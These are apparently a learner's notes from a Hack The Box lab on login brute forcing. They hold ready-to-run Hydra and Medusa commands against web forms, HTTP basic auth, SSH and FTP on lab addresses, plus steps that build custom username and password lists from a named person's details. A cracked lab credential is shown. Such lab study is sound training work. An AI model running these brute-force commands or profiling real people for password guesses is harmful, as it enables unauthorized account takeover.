# HTB Login Brute Forcing

## Login Forms


### Hydra

hydra basic auth
hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 127.0.0.1 http-get / -s 81

can use hydra to crack passcodes in the login:

djelly@htb[/htb]$ hydra [options] target http-post-form "path:params:condition_string"


I can look for a fail condition like:
hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"

Or a success conditions:

- hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302" # looking for a redirect

- hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=Dashboard" # looking for "Dashboard"


### Exercise

curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt

curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt

hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f {Replace with ip} -s {replace with port} http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"


hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.251.254 -s 34996 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"


## Medusa

medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh

medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3

medusa -h 94.237.59.119 -n 39693 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3


## Custom Wordlists

create likely usernames from a persons name:
git clone https://github.com/urbanadventurer/username-anarchy.git
./username-anarchy Jane Smith > jane_smith_usernames.txt

`cupp -i`
cupp in interactive mode will create lots of passwords from a persons life.

hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"

:
hydra -L jane_smith_usernames.txt -P jane-filtered.txt 94.237.60.154 -s 46018 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"


## Skill assessment1

:56383
hydra -L usernames.txt -P passwords.txt 94.237.50.94 http-get / -s 56383
[56383][http-get] host: 94.237.50.94   login: admin   password: Admin123

## Skill assess2

83.136.250.158:39972
hydra -L usernames.txt -P passwords.txt -s 38376 -V 94.237.50.94 ftp

hydra -l satwossh -P passwords.txt -s 39972 -V 83.136.250.158 ssh -t 4 

medusa -M ssh -h 83.136.250.158  -u root -P passwords.txt -n 39972  -t 4